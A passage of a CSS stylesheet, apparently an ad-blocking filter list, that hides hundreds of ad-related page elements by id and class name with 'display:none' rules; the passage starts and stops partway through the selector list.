,#leaderad,#leaderad_section,#leaderboard-ad,#leaderboard-bottom-ad,#leaderboardAd,#leaderboard_ad,#leaderboard_ad_gam,#left-ad-1,#left-ad-2,#left-ad-col,#left-ad-skin,#left-bottom-ad,#left-lower-adverts,#left-lower-adverts-container,#leftAdContainer,#leftAd_rdr,#leftAdvert,#leftSectionAd300-100,#left_ad,#left_adspace,#leftad,#leftads,#leftcolAd,#lg-banner-ad,#ligatus,#linkAds,#linkads,#live-ad,#localAds,#logoAd,#longAdSpace,#long_advertisement,#lowerAdvertisementImg,#lower_ad,#lowerads,#lowerthirdad,#lowertop-adverts,#lowertop-adverts-container,#lpAdPanel,#lrecad,#lsadvert-left_menu_1,#lsadvert-left_menu_2,#lsadvert-top,#mBannerAd,#main-ad,#main-ad160x600,#main-ad160x600-img,#main-ad728x90,#main-advert1,#main-advert2,#main-advert3,#main-bottom-ad,#main-tj-ad,#mainAd,#mainAdUnit,#mainAdvert,#mainAdvertismentP,#mainHeaderAdvertisment,#main_ad,#main_rec_ad,#main_top_ad_container,#marketing-promo,#mastAd,#mastAdvert,#mastad,#mastercardAd,#masthead_ad,#masthead_topad,#medRecAd,#media_ad,#mediaplayer_adburner,#mediumAdvertisement,#medrectad,#menuAds,#menubanner-ad-content,#mi_story_assets_ad,#mid-ad300x250,#mid-table-ad,#midRightTextAds,#mid_ad_div,#mid_ad_title,#mid_mpu,#midadd,#midadspace,#middle-ad,#middle_ad,#middle_body_advertising,#middlead,#middleads,#midrect_ad,#midstrip_ad,#mini-ad,#mochila-column-right-ad-300x250,#mochila-column-right-ad-300x250-1,#module-google_ads,#module_ad,#module_box_ad,#module_sky_scraper,#monsterAd,#moogleAd,#moreads,#most_popular_ad,#motionAd,#mpu-advert,#mpu-cont,#mpu300250,#mpuAd,#mpuDiv,#mpuSlot,#mpuWrapper,#mpuWrapperAd,#mpu_banner,#mpu_firstpost,#mpu_holder,#mpu_text_ad,#mpuad,#mpubox,#mr_banner_topad,#mrecAdContainer,#msAds,#ms_ad,#msad,#multiLinkAdContainer,#multi_ad,#my-ads,#myads_HeaderButton,#n_sponsor_ads,#namecom_ad_hosting_main,#narrow-ad,#narrow_ad_unit,#natadad300x250,#national_microlink_ads,#nationalad,#navi_banner_ad_780,#nba160PromoAd,#nba300Ad,#nbaGI300ad,#nbaHouseAnd600Ad,#nbaLeft600Ad,#nbaMidAds,#nbaVid300Ad,#nbcAd300x250,#new_topad,#newads,#news_advertorial_content,#news_advertorial_top,#ng_rtcol_ad,#noresults_ad_container,#noresultsads,#northad,#northbanner-advert,#northbanner-advert-container,#ns_ad1,#ns_ad2,#ns_ad3,#oanda_ads,#onespot-ads,#online_ad,#ovadsense,#p-googleadsense,#page-header-ad,#page-top-ad,#pageAds,#pageAdsDiv,#pageBannerAd,#page_ad,#page_content_top_ad,#pagelet_adbox,#pagelet_netego_ads,#pagelet_search_ads2,#panelAd,#pb_report_ad,#pcworldAdBottom,#pcworldAdTop,#pinball_ad,#player-below-advert,#player_ad,#player_ads,#pmad-in1,#pod-ad-video-page,#populate_ad_bottom,#populate_ad_left,#popup_domination_lightbox_wrapper,#portlet-advertisement-left,#portlet-advertisement-right,#post-promo-ad,#post5_adbox,#post_ad,#premium_ad,#priceGrabberAd,#prime-ad-space,#print-header-ad,#print_ads,#printads,#product-adsense,#promo-ad,#promoAds,#ps-vertical-ads,#pub468x60,#publicidad,#pushdown_ad,#qm-ad-big-box,#qm-ad-sky,#qm-dvdad,#quigo_ad,#r1SoftAd,#rail_ad1,#rail_ad2,#realEstateAds,#rectAd,#rect_ad,#rectangle-ad,#rectangleAd,#rectangle_ad,#refine-300-ad,#region-node-advert,#region-top-ad,#relocation_ad_container,#rh-ad-container,#rh_tower_ad,#rhapsodyAd,#rhs_ads,#rhsadvert,#right-ad,#right-ad-col,#right-ad-skin,#right-ad-title,#right-ad1,#right-ads-3,#right-advert,#right-bar-ad,#right-box-ad,#right-featured-ad,#right-mpu-1-ad-container,#right-uppder-adverts,#right-uppder-adverts-container,#rightAd,#rightAd300x250,#rightAd300x250Lower,#rightAdBar,#rightAdColumn,#rightAd_rdr,#rightAdsDiv,#rightColAd,#rightColumnMpuAd,#rightColumnSkyAd,#right_ad,#right_ad_wrapper,#right_ads,#right_advert,#right_advertisement,#right_advertising,#right_column_ad_container,#right_column_ads,#right_column_adverts,#right_column_internal_ad_container,#right_column_top_ad_unit,#rightad,#rightadContainer,#rightads,#rightadvertbar-doubleclickads,#rightbar-ad,#rightcolhouseads,#rightcolumn_300x250ad,#rightgoogleads,#rightinfoad,#rightside-ads,#rightside_ad,#righttop-adverts,#righttop-adverts-container,#rm_ad_text { display:none !important; } #ros_ad,#rotatingads,#row2AdContainer,#rprightHeaderAd,#rr_MSads,#rt-ad,#rt-ad-top,#rt-ad468,#rtMod_ad,#rtmod_ad,#sAdsBox,#sb-ad-sq,#sb_ad_links,#sb_advert,#search-google-ads,#search-sponsored-links,#search-sponsored-links-top,#searchAdSenseBox,#searchAdSenseBoxAd,#searchAdSkyscraperBox,#search_ads,#search_result_ad,#sec_adspace,#second-adlayer,#secondBoxAdContainer,#secondrowads,#sect-ad-300x100,#sect-ad-300x250-2,#section-ad-1-728,#section-ad-300-250,#section-ad-4-160,#section-blog-ad,#section-container-ddc_ads,#section_advertisements,#section_advertorial_feature,#servfail-ads,#sew-ad1,#shoppingads,#shortads,#show-ad,#showAd,#showad,#side-ad,#side-ad-container,#side-ads,#sideAd,#sideAd1,#sideAd2,#sideAdSub,#sideAds,#sideBarAd,#side_ad,#side_ad_wrapper,#side_ads_by_google,#side_sky_ad,#sidead,#sideads,#sideadtop-to,#sidebar-125x125-ads,#sidebar-125x125-ads-below-index,#sidebar-ad,#sidebar-ad-boxes,#sidebar-ad-space,#sidebar-ad-wrap,#sidebar-ad3,#sidebar-ads,#sidebar-adv,#sidebar-sponsor-link,#sidebar2ads,#sidebar_ad,#sidebar_ad_widget,#sidebar_ads,#sidebar_ads_180,#sidebar_sponsoredresult_body,#sidebar_txt_ad_links,#sidebarad,#sidebaradpane,#sidebarads,#sidebaradver_advertistxt,#sideline-ad,#single-mpu,#singlead,#site-ad-container,#site-leaderboard-ads,#site_top_ad,#sitead,#sky-ad,#skyAd,#skyAdContainer,#skyScrapperAd,#skyWrapperAds,#sky_ad,#sky_advert,#skyads,#skyadwrap,#skyline_ad,#skyscrapeAd,#skyscraper-ad,#skyscraperAd,#skyscraperAdContainer,#skyscraper_ad,#skyscraper_advert,#skyscraperad,#slide_ad,#sliderAdHolder,#slideshow_ad_300x250,#sm-banner-ad,#small_ad,#small_ad_banners_vertical,#small_ads,#smallerAd,#some-ads,#some-more-ads,#specialAd_one,#specialAd_two,#specialadvertisingreport_container,#specials_ads,#speeds_ads,#speeds_ads_fstitem,#speedtest_mrec_ad,#sphereAd,#spnAds,#sponlink,#sponlinks,#sponsAds,#sponsLinks,#sponseredlinks,#sponsorAd1,#sponsorAd2,#sponsorAdDiv,#sponsorLinks,#sponsorTextLink,#sponsor_banderole,#sponsor_deals,#sponsored,#sponsored-ads,#sponsored-features,#sponsored-links,#sponsored-listings,#sponsored-resources,#sponsored1,#sponsoredBox1,#sponsoredBox2,#sponsoredLinks,#sponsoredLinks_Top,#sponsoredList,#sponsoredResults,#sponsoredResultsWide,#sponsoredSiteMainline,#sponsoredSiteSidebar,#sponsored_ads_v4,#sponsored_container,#sponsored_content,#sponsored_game_row_listing,#sponsored_head,#sponsored_link,#sponsored_link_bottom,#sponsored_links,#sponsored_v12,#sponsoredads,#sponsoredlinks,#sponsoredlinks_cntr,#sponsoredlinkslabel,#sponsoredresults_top,#sponsoredwellcontainerbottom,#sponsoredwellcontainertop,#sponsorlink,#spotlightAds,#spotlightad,#sqAd,#squareAd,#squareAdSpace,#squareAds,#square_ad,#srp_adsense-top,#start_middle_container_advertisment,#sticky-ad,#stickyBottomAd,#story-90-728-area,#story-ad-a,#story-ad-b,#story-leaderboard-ad,#story-sponsoredlinks,#storyAd,#storyAdWrap,#storyad2,#submenu-ads,#subpage-ad-right,#subpage-ad-top,#swads,#synch-ad,#systemad_background,#tabAdvertising,#takeoverad,#tblAd,#tbl_googlead,#tcwAd,#td-GblHdrAds,#template_ad_leaderboard,#tertiary_advertising,#test_adunit_160_article,#text-ad,#text-ads,#text-link-ads,#textAd,#textAds,#text_ad,#text_ads,#text_advert,#textad,#textad3,#textad_block,#the-last-ad-standing,#thefooterad,#themis-ads,#tile-ad,#tmglBannerAd,#tmp2_promo_ad,#toolbarSlideUpAd,#top-ad,#top-ad-container,#top-ad-menu,#top-ads,#top-ads-tabs,#top-advertisement,#top-banner-ad,#top-search-ad-wrapper,#topAd,#topAd728x90,#topAdBanner,#topAdBox,#topAdContainer,#topAdSenseDiv,#topAdcontainer,#topAds,#topAdsContainer,#topAdvBox,#topAdvert,#topAdvert-09,#topBannerAd,#topBannerAdContainer,#topContentAdTeaser,#topNavLeaderboardAdHolder,#topOverallAdArea,#topRightBlockAdSense,#topSponsoredLinks,#top_ad,#top_ad-sense,#top_ad_area,#top_ad_banner,#top_ad_game,#top_ad_unit,#top_ad_wrapper,#top_ad_zone,#top_ads,#top_ads_wrap,#top_advertise,#top_advertising,#top_rectangle_ad,#top_right_ad,#top_wide_ad,#topad,#topad1,#topad2,#topad_left,#topad_right,#topadbar,#topadblock,#topaddwide,#topads,#topadsense,#topadspace,#topadwrap,#topadzone,#topbanner_ad,#topbannerad,#topbar-ad,#topcustomad,#topleaderboardad,#topnav-ad-shell,#topnavad,#toprightAdvert,#toprightad,#topsponsored,#toptextad,#tour300Ad,#tour728Ad,#tourSponsoredLinksContainer,#towerad,#ts-ad_module,#ttp_ad_slot1,#ttp_ad_slot2,#twogamesAd,#txfPageMediaAdvertVideo,#txt_link_ads,#txtads,#undergameAd,#upper-ads,#upperAdvertisementImg,#upperMpu,#upper_small_ad,#upperad,#urban_contentad_1,#urban_contentad_2,#urban_contentad_article,#v_ad,#vap_adsense-top,#vert-ads,#vert_ad,#vert_ad_placeholder,#vertical_ad,#vertical_ads,#videoAd,#videoAdvert,#video_ads_overdiv,#video_advert2,#video_advert3,#video_cnv_ad,#video_overlay_ad,#videoadlogo,#view_ads,#view_ads_advertisements,#viewads,#viewportAds,#viewvid_ad300x250,#wXcds12-ad,#wall_advert,#wallpaper-ad-link,#wallpaperAd_left,#wallpaperAd_right,#walltopad,#weblink_ads_container,#welcomeAdsContainer,#welcome_ad_mrec,#welcome_advertisement,#wf_ContentAd,#wf_FrontSingleAd,#wf_SingleAd,#wf_bottomContentAd,#wgtAd,#whatsnews_top_ad,#whitepaper-ad,#whoisRightAdContainer,#wide_ad_unit_top,#wideskyscraper_160x600_left,#wideskyscraper_160x600_right,#widget_Adverts,#widget_advertisement,#widgetwidget_adserve2,#wrapAdRight,#wrapAdTop,#wrapperAdsTopLeft,#wrapperAdsTopRight,#xColAds,#y-ad-units,#y708-ad-expedia,#y708-ad-lrec,#y708-ad-partners,#y708-ad-ysm,#y708-advertorial-marketplace,#yahoo-ads,#yahoo-sponsors,#yahooSponsored,#yahoo_ads,#yahoo_ads_2010,#yahoo_text_ad,#yahooad-tbl,#yan-sponsored,#yatadsky,#ybf-ads,#yfi_fp_ad_mort,#yfi_fp_ad_nns,#yfi_pf_ad_mort,#ygrp-sponsored-links,#ymap_adbanner,#yn-gmy-ad-lrec,#yreSponsoredLinks,#ysm_ad_iframe,#zoneAdserverMrec,#zoneAdserverSuper,.ADBAR,.ADPod,.AD_ALBUM_ITEMLIST,.AD_MOVIE_ITEM,.AD_MOVIE_ITEMLIST,.AD_MOVIE_ITEMROW,.ADbox,.Ad-300x100,.Ad-Container-976x166,.Ad-Header,.Ad-MPU,.Ad-Wrapper-300x100,.Ad120x600,.Ad160x600,.Ad160x600left,.Ad160x600right,.Ad247x90,.Ad300x,.Ad300x250,.Ad300x250L,.Ad728x90,.AdBorder,.AdBox,.AdBox7,.AdContainerBox308,.AdContainerModule,.AdHeader,.AdHere,.AdInfo,.AdInline,.AdMedium,.AdPlaceHolder,.AdProS728x90Container,.AdProduct,.AdRingtone,.AdSense,.AdSenseLeft,.AdSlot,.AdSpace,.AdTextSmallFont,.AdTitle,.AdUnit,.AdUnit300,.Ad_C,.Ad_D_Wrapper,.Ad_E_Wrapper,.Ad_Right,.AdsBottom,.AdsBoxBottom,.AdsBoxSection,.AdsBoxTop,.AdsLinks1,.AdsLinks2,.AdsRec,.AdvBoxSidebar,.Advert,.Advert300x250,.AdvertMidPage,.AdvertiseWithUs,.Advertisement,.AdvertisementTextTag,.Advman_Widget,.ArticleAd,.ArticleInlineAd,.BCA_Advertisement,.Banner300x250,.BannerAd,.BigBoxAd,.BlockAd,.BlueTxtAdvert,.BottomAdContainer,.BottomAffiliate,.BoxAd,.CG_adkit_leaderboard,.CG_details_ad_dropzone,.CWReviewsProdInfoAd,.ComAread,.CommentAd,.ContentAd,.ContentAds,.DAWRadvertisement,.DeptAd,.DisplayAd,.FT_Ad,.FeaturedAdIndexAd,.FlatAds,.FooterAds,.GOOGLE_AD,.GoogleAd,.GoogleAdSenseBottomModule,.GoogleAdSenseRightModule,.HPG_Ad_B,.HPNewAdsBannerDiv,.HPRoundedAd,.HeaderAds,.HomeContentAd,.IABAdSpace,.InArticleAd,.IndexRightAd,.LazyLoadAd,.LeftAd,.LeftButtonAdSlot,.LeftTowerAd,.M2Advertisement,.MD_adZone,.MOS-ad-hack,.MPUHolder,.MPUTitleWrapperClass,.MREC_ads,.MiddleAd,.MiddleAdContainer,.MiddleAdvert,.NewsAds,.OpaqueAdBanner,.OpenXad,.PU_DoubleClickAdsContent,.Post5ad,.Post8ad,.Post9ad,.RBboxAd,.RW_ad300,.RectangleAd,.RelatedAds,.Right300x250AD,.RightAd1,.RightAdvertiseArea,.RightAdvertisement,.RightGoogleAFC,.RightRailAd,.RightRailTop300x250Ad,.RightSponsoredAdTitle,.RightTowerAd,.STR_AdBlock,.SectionSponsor,.SideAdCol,.SidebarAd,.SidebarAdvert,.SitesGoogleAdsModule,.SkyAdContainer,.SponsoredAdTitle,.SponsoredContent,.SponsoredLinkItemTD,.SponsoredLinks,.SponsoredLinksGrayBox,.SponsoredLinksModule,.SponsoredLinksPadding,.SponsoredLinksPanel,.Sponsored_link,.SquareAd,.StandardAdLeft,.StandardAdRight,.TRU-onsite-ads-leaderboard,.TextAd,.TheEagleGoogleAdSense300x250,.TopAd,.TopAdContainer,.TopAdL,.TopAdR,.TopBannerAd,.UIWashFrame_SidebarAds,.UnderAd,.VerticalAd,.Video-Ad,.VideoAd,.WidgetAdvertiser,.a160x600,.a728x90,.ad-120x60,.ad-120x600,.ad-160,.ad-160x600,.ad-160x600x1,.ad-160x600x2,.ad-160x600x3,.ad-250,.ad-300,.ad-300-block,.ad-300-blog,.ad-300x100,.ad-300x250,.ad-300x250-first,.ad-300x250-right0,.ad-300x600,.ad-350,.ad-355x75,.ad-600,.ad-635x40,.ad-728,.ad-728x90,.ad-728x90-1,.ad-728x90-top0,.ad-728x90_forum,.ad-90x600,.ad-above-header,.ad-adlink-bottom,.ad-adlink-side,.ad-area,.ad-background,.ad-banner,.ad-banner-smaller,.ad-bigsize,.ad-block,.ad-block-square,.ad-blog2biz,.ad-body,.ad-bottom,.ad-box,.ad-break,.ad-btn,.ad-btn-heading,.ad-button,.ad-cell,.ad-column,.ad-container,.ad-container-300x250,.ad-container-728x90,.ad-container-994x282,.ad-context,.ad-disclaimer,.ad-display,.ad-div,.ad-enabled,.ad-feedback,.ad-filler,.ad-flex,.ad-footer,.ad-footer-leaderboard,.ad-forum,.ad-google,.ad-graphic-large,.ad-gray,.ad-grey,.ad-hdr,.ad-head,.ad-header,.ad-heading,.ad-holder,.ad-homeleaderboard,.ad-img,.ad-in-post,.ad-index-main,.ad-inline,.ad-island,.ad-item,.ad-label,.ad-leaderboard,.ad-left,.ad-link,.ad-links,.ad-lrec,.ad-medium,.ad-medium-two,.ad-mpl,.ad-mpu,.ad-msn,.ad-note,.ad-notice,.ad-other,.ad-permalink,.ad-place-active,.ad-placeholder,.ad-postText,.ad-poster,.ad-priority,.ad-rect,.ad-rectangle,.ad-rectangle-text,.ad-related,.ad-rh,.ad-ri,.ad-right,.ad-right-header,.ad-right-txt,.ad-row,.ad-section,.ad-show-label,.ad-side,.ad-sidebar,.ad-sidebar-outer,.ad-sidebar300,.ad-sky,.ad-skyscr,.ad-skyscraper,.ad-slot,.ad-slot-234-60,.ad-slot-300-250,.ad-slot-728-90,.ad-source,.ad-space,.ad-space-mpu-box,.ad-space-topbanner,.ad-spot,.ad-square,.ad-square300,.ad-squares,.ad-statement,.ad-story-inject,.ad-tabs,.ad-text,.ad-text-links,.ad-tile,.ad-title,.ad-top,.ad-top-left,.ad-unit,.ad-unit-300,.ad-unit-300-wrapper,.ad-unit-anchor,.ad-unit-top,.ad-vert,.ad-vertical-container,.ad-vtu,.ad-widget-list,.ad-with-us,.ad-wrap,.ad-wrapper,.ad-zone,.ad-zone-s-q-l,.ad.super,.ad08sky,.ad100,.ad120,.ad120x240backgroundGray,.ad120x600,.ad125,.ad140,.ad160,.ad160600,.ad160x600,.ad160x600GrayBorder,.ad200x60,.ad230,.ad250,.ad250c,.ad300,.ad300250,.ad300_250,.ad300x100,.ad300x250,.ad300x250-hp-features,.ad300x250Module,.ad300x250Top,.ad300x250_container,.ad300x250box,.ad300x50-right,.ad300x600,.ad310,.ad315,.ad336x280,.ad343x290,.ad400right,.ad450,.ad468,.ad468_60,.ad468x60,.ad540x90,.ad600,.ad620x70,.ad626X35,.ad644,.ad728,.ad728_90,.ad728x90,.ad728x90_container,.ad90x780,.adAgate,.adArea674x60,.adBanner,.adBanner300x250,.adBanner728x90,.adBannerTyp1,.adBannerTypSortableList,.adBannerTypW300,.adBar,.adBgBottom,.adBgMId,.adBgTop,.adBlock,.adBottomLink,.adBottomboxright,.adBox,.adBox1,.adBox230X96,.adBox728X90,.adBoxBody,.adBoxBorder,.adBoxContainer,.adBoxContent,.adBoxInBignews,.adBoxSidebar,.adBoxSingle,.adBwrap,.adCMRight,.adCell,.adColumn,.adCont,.adContTop,.adContainer,.adContentAd,.adContour,.adCreative,.adCube,.adDiv,.adElement,.adFender3,.adFrame,.adFtr,.adFullWidthMiddle,.adGoogle,.adHeader,.adHeadline,.adHolder,.adHome300x250,.adHorisontal,.adInNews,.adIsland,.adLabel,.adLeader,.adLeaderForum,.adLeaderboard,.adLeft,.adLoaded,.adLocal,.adMPU,.adMarker,.adMastheadLeft,.adMastheadRight,.adMegaBoard,.adMinisLR,.adMkt2Colw,.adModule,.adModuleAd,.adMpu,.adNewsChannel,.adNoOutline,.adNotice,.adNoticeOut,.adObj,.adPageBorderL,.adPageBorderR,.adPanel,.adPod,.adRect,.adResult,.adRight,.adSKY,.adSelfServiceAdvertiseLink,.adServer,.adSky,.adSky600,.adSkyscaper,.adSkyscraperHolder,.adSlot,.adSpBelow,.adSpace,.adSpacer,.adSplash,.adSponsor,.adSpot,.adSpot-brought,.adSpot-searchAd,.adSpot-textBox,.adSpot-twin,.adSpotIsland,.adSquare,.adSubColPod,.adSummary,.adSuperboard,.adSupertower,.adTD,.adTab,.adTag,.adText,.adTileWrap,.adTiler,.adTitle,.adTopLink,.adTopboxright,.adTout,.adTxt,.adUnit,.adUnitHorz,.adUnitVert,.adUnitVert_noImage,.adWebBoard,.adWidget,.adWithTab,.adWord,.adWrap,.adWrapper,.ad_0,.ad_1,.ad_120x90,.ad_125,.ad_130x90,.ad_160,.ad_160x600,.ad_2,.ad_200,.ad_200x200,.ad_250x250,.ad_250x250_w,.ad_3,.ad_300,.ad_300_250,.ad_300x250,.ad_300x250_box_right,.ad_336,.ad_336x280,.ad_350x100,.ad_350x250,.ad_400x200,.ad_468,.ad_468x60,.ad_600,.ad_680x15,.ad_728,.ad_728_90b,.ad_728x90,.ad_925x90,.ad_Left,.ad_Right,.ad_ad_300,.ad_amazon,.ad_banner,.ad_banner_border,.ad_bar,.ad_bg,.ad_bigbox,.ad_biz,.ad_block,.ad_block_338,.ad_body,.ad_border,.ad_botbanner,.ad_bottom,.ad_bottom_leaderboard,.ad_bottom_left,.ad_box,.ad_box2,.ad_box_ad,.ad_box_div,.ad_callout,.ad_caption,.ad_column,.ad_column_box,.ad_column_hl,.ad_contain,.ad_container,.ad_content,.ad_content_wide,.ad_contents,.ad_descriptor,.ad_disclaimer,.ad_eyebrow,.ad_footer,.ad_frame,.ad_framed,.ad_front_promo,.ad_gutter_top,.ad_head,.ad_header,.ad_heading,.ad_headline,.ad_holder,.ad_hpm,.ad_image,.ad_info_block,.ad_inline,.ad_island,.ad_jnaught,.ad_label,.ad_launchpad,.ad_leader,.ad_leaderboard,.ad_left,.ad_line,.ad_link,.ad_links,.ad_linkunit,.ad_loc,.ad_lrec,.ad_main,.ad_medrec,.ad_medrect,.ad_middle,.ad_mod,.ad_mp,.ad_mpu,.ad_mr,.ad_mrec,.ad_mrec_title_article,.ad_mrect,.ad_news,.ad_note,.ad_notice,.ad_one,.ad_p360,.ad_partner,.ad_partners,.ad_plus,.ad_post,.ad_power,.ad_primary,.ad_promo,.ad_rec,.ad_rectangle,.ad_right,.ad_right_col,.ad_row,.ad_row_bottom_item,.ad_side,.ad_sidebar,.ad_skyscraper,.ad_slug,.ad_slug_table,.ad_space,.ad_space_300_250,.ad_spacer,.ad_sponsor { display:none !important; } .ad_sponsoredsection,.ad_spot_b,.ad_spot_c,.ad_square_r,.ad_square_top,.ad_sub,.ad_tag_middle,.ad_text,.ad_text_w,.ad_title,.ad_top,.ad_top_leaderboard,.ad_top_left,.ad_topright,.ad_tower,.ad_unit,.ad_unit_rail,.ad_url,.ad_warning,.ad_wid300,.ad_wide,.ad_wrap,.ad_wrapper,.ad_wrapper_fixed,.ad_wrapper_top,.ad_wrp,.ad_zone,.adarea,.adarea-long,.adbanner,.adbannerbox,.adbannerright,.adbar,.adboard,.adborder,.adbot,.adbottom,.adbottomright,.adbox-outer,.adbox-wrapper,.adbox_300x600,.adbox_366x280,.adbox_468X60,.adbox_bottom,.adbox_br,.adbox_left,.adboxclass,.adboxesrow,.adbreak,.adbug,.adbutton,.adbuttons,.adcode,.adcol1,.adcol2,.adcolumn,.adcolumn_wrapper,.adcont,.adcopy,.add_300x250,.addiv,.adenquire,.adfieldbg,.adfoot,.adfootbox,.adframe,.adhead,.adhead_h,.adhead_h_wide,.adheader,.adheader100,.adheader416,.adhi,.adhint,.adholder,.adhoriz,.adiframe,.adinfo,.adinside,.adintro,.adits,.adjlink,.adkicker,.adkit,.adkit-advert,.adkit-lb-footer,.adlabel-horz,.adlabel-vert,.adlabelleft,.adlayer,.adleader,.adleaderboard,.adleft1,.adline,.adlink,.adlinks,.adlist,.adlnklst,.admarker,.admediumred,.admedrec,.admessage,.admodule,.admpu,.admpu-small,.adnation-banner,.adnotice,.adops,.adp-AdPrefix,.adpadding,.adpane,.adpic,.adprice,.adproxy,.adrec,.adright,.adroot,.adrotate_widget,.adrow,.adrow-post,.adrow1box1,.adrow1box3,.adrow1box4,.adrule,.ads-125,.ads-300,.ads-300x250,.ads-728x90-wrap,.ads-ads-top,.ads-banner,.ads-below-content,.ads-categories-bsa,.ads-custom,.ads-favicon,.ads-item,.ads-links-general,.ads-mpu,.ads-outer,.ads-profile,.ads-right,.ads-section,.ads-sidebar,.ads-sky,.ads-small,.ads-sponsors,.ads-stripe,.ads-text,.ads-top,.ads-wide,.ads-widget,.ads-widget-partner-gallery,.ads03,.ads160,.ads1_250,.ads24Block,.ads300,.ads460,.ads460_home,.ads468,.ads728,.ads728x90,.adsArea,.adsBelowHeadingNormal,.adsBlock,.adsBottom,.adsBox,.adsCell,.adsCont,.adsDiv,.adsFull,.adsImages,.adsInsideResults_v3,.adsMPU,.adsMiddle,.adsRight,.adsRow,.adsTextHouse,.adsTop,.adsTower2,.adsTowerWrap,.adsWithUs,.ads_125_square,.ads_180,.ads_300,.ads_300x100,.ads_300x250,.ads_320,.ads_337x280,.ads_728x90,.ads_big,.ads_big-half,.ads_box,.ads_box_headline,.ads_brace,.ads_catDiv,.ads_container,.ads_disc_anchor,.ads_disc_leader,.ads_disc_lwr_square,.ads_disc_skyscraper,.ads_disc_square,.ads_div,.ads_footer,.ads_header,.ads_holder,.ads_horizontal,.ads_leaderboard,.ads_lr_wrapper,.ads_medrect,.ads_mpu,.ads_outer,.ads_post_end,.ads_post_end_code,.ads_post_start,.ads_post_start_code,.ads_rectangle,.ads_remove,.ads_right,.ads_rightbar_top,.ads_sc_bl_i,.ads_sc_tb,.ads_sc_tl_i,.ads_show_if,.ads_side,.ads_sidebar,.ads_singlepost,.ads_spacer,.ads_takeover,.ads_title,.ads_top,.ads_top_promo,.ads_tr,.ads_verticalSpace,.ads_vtlLink,.ads_widesky,.ads_wrapperads_top,.adsafp,.adsbg300,.adsblockvert,.adsborder,.adsbottom,.adsbox,.adsboxitem,.adsbttmpg,.adsbyyahoo,.adscaleAdvert,.adscaleP6_canvas,.adsclick,.adscontainer,.adscreen,.adsd_shift100,.adsection_a2,.adsection_c2,.adsense-468,.adsense-ad,.adsense-category,.adsense-category-bottom,.adsense-googleAds,.adsense-heading,.adsense-overlay,.adsense-post,.adsense-right,.adsense-title,.adsense3,.adsense300,.adsenseAds,.adsenseBlock,.adsenseContainer,.adsenseGreenBox,.adsenseInPost,.adsenseList,.adsense_bdc_v2,.adsense_mpu,.adsensebig,.adsenseblock,.adsenseblock_bottom,.adsenseblock_top,.adsenselr,.adsensem_widget,.adsensesq,.adsenvelope,.adserver_zone,.adset,.adsforums,.adsghori,.adsgvert,.adshome,.adside,.adsidebox,.adsider,.adsingle,.adsleft,.adsleftblock,.adslink,.adslogan,.adslotleft,.adslotright,.adsmalltext,.adsmessage,.adsnippet_widget,.adspace,.adspace-MR,.adspace-widget,.adspace180,.adspace_bottom,.adspace_buysell,.adspace_rotate,.adspace_skyscraper,.adspacer,.adspot,.adspot728x90,.adstext,.adstextpad,.adstitle,.adstop,.adstory,.adstrip,.adtab,.adtable,.adtag,.adtech,.adtext,.adtext_gray,.adtext_horizontal,.adtext_onwhite,.adtext_vertical,.adtile,.adtips,.adtips1,.adtitle,.adtop,.adtravel,.adtxt,.adtxtlinks,.adunit,.adv-mpu,.adv-p,.adv-sidebar,.adv300,.advBox,.advSquare,.advVideobox,.adv_120x600,.adv_300x250,.adv_728x90,.adv_banner_hor,.adv_medium_rectangle,.adver,.adverTag,.adverTxt,.adver_cont_below,.advert-300-side,.advert-300x100-side,.advert-728x90,.advert-article-bottom,.advert-bannerad,.advert-bg-250,.advert-bloggrey,.advert-box,.advert-btm,.advert-head,.advert-horizontal,.advert-iab-300-250,.advert-iab-468-60,.advert-mpu,.advert-skyscraper,.advert-text,.advert-title,.advert-txt,.advert120,.advert300,.advert300x250,.advert300x300,.advert300x440,.advert350ih,.advert4,.advert5,.advert728x90,.advert8,.advertColumn,.advertCont,.advertContainer,.advertContent,.advertHeadline,.advertIslandWrapper,.advertRight,.advertSuperBanner,.advertText,.advertTitleSky,.advert_336,.advert_468x60,.advert_box,.advert_cont,.advert_container,.advert_djad,.advert_google_content,.advert_google_title,.advert_home_300,.advert_label,.advert_leaderboard,.advert_list,.advert_note,.advert_surr,.advert_top,.advertheader-red,.advertise,.advertise-here,.advertise-homestrip,.advertise-horz,.advertise-inquiry,.advertise-leaderboard,.advertise-list,.advertise-top,.advertise-vert,.advertiseContainer,.advertiseText,.advertise_ads,.advertise_here,.advertise_link,.advertise_link_sidebar,.advertisement,.advertisement-728x90,.advertisement-block,.advertisement-sidebar,.advertisement-space,.advertisement-sponsor,.advertisement-swimlane,.advertisement-text,.advertisement-top,.advertisement300x250,.advertisement468,.advertisementBox,.advertisementColumnGroup,.advertisementContainer,.advertisementHeader,.advertisementLabel,.advertisementPanel,.advertisementText,.advertisement_300x250,.advertisement_btm,.advertisement_caption,.advertisement_g,.advertisement_header,.advertisement_horizontal,.advertisement_top,.advertisementsOutterDiv,.advertiser,.advertiser-links,.advertisespace_div,.advertising-banner,.advertising-header,.advertising-leaderboard,.advertising-local-links,.advertising2,.advertisingTable,.advertising_block,.advertising_images,.advertisment,.advertisment_bar,.advertisment_caption,.advertisment_two,.advertize,.advertize_here,.advertorial,.advertorial-2,.advertorial-promo-box,.advertorial_red,.advertorialtitle,.adverts,.adverts-125,.adverts_RHS,.advt,.advt-banner-3,.advt-block,.advt-sec,.advt300,.advt720,.advtitle,.adwhitespace,.adwordListings,.adwords,.adwordsHeader,.adwrap,.adwrapper-lrec,.adwrapper948,.adzone-footer,.adzone-sidebar,.affiliate-link,.affiliate-sidebar,.affiliateAdvertText,.affiliates-sidebar,.affinityAdHeader,.afsAdvertising,.after_ad,.agi-adsaleslinks,.alb-content-ad,.alignads,.alt_ad,.anchorAd,.another_text_ad,.answer_ad_content,.aolSponsoredLinks,.aopsadvert,.apiAdMarkerAbove,.apiAds,.app_advertising_skyscraper,.archive-ads,.art_ads,.article-ad-box,.article-ads,.article-content-adwrap,.articleAd,.articleAd300x250,.articleAds,.articleAdsL,.articleEmbeddedAdBox,.article_ad,.article_adbox,.article_mpu_box,.article_page_ads_bottom,.articleads,.aseadn,.aux-ad-widget-1,.aux-ad-widget-2,.b-astro-sponsored-links_horizontal,.b-astro-sponsored-links_vertical,.b_ads_cont,.b_ads_top,.banmanad,.banner-468-60,.banner-468x60,.banner-ad,.banner-ads,.banner-adv,.banner-advert,.banner-adverts,.banner-buysellads,.banner160x600,.banner300by250,.banner300x100,.banner300x250,.banner468,.banner468by60,.banner728x90,.bannerADV,.bannerAd,.bannerAdWrapper300x250,.bannerAdWrapper730x86,.bannerAds,.bannerAdvert,.bannerRightAd,.banner_160x6